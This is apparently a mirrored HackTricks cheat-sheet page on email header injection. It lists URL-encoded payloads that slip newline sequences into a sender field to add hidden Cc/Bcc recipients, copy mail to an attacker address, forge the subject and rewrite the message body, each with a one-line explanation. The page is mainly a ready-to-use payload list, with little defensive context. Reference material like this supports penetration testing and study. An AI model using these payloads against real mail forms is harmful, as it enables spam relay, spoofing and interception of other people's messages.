mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 14:10:41 +00:00
924 B
924 B
Email Header Injection
https://resources.infosecinstitute.com/email-injection/
Inject Cc and Bcc after sender argument
From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com
The message will be sent to the recipient and recipient1 accounts.
Inject argument
From:sender@domain.com%0ATo:attacker@domain.com
The message will be sent to the original recipient and the attacker account.
Inject Subject argument
From:sender@domain.com%0ASubject:This’s%20Fake%20Subject
The fake subject will be added to the original subject and in some cases will replace it. It depends on the mail service behavior.
Change the body of the message
Inject a two-line feed, then write your message to change the body of the message.
From:sender@domain.com%0A%0AMy%20New%20%0Fake%20Message.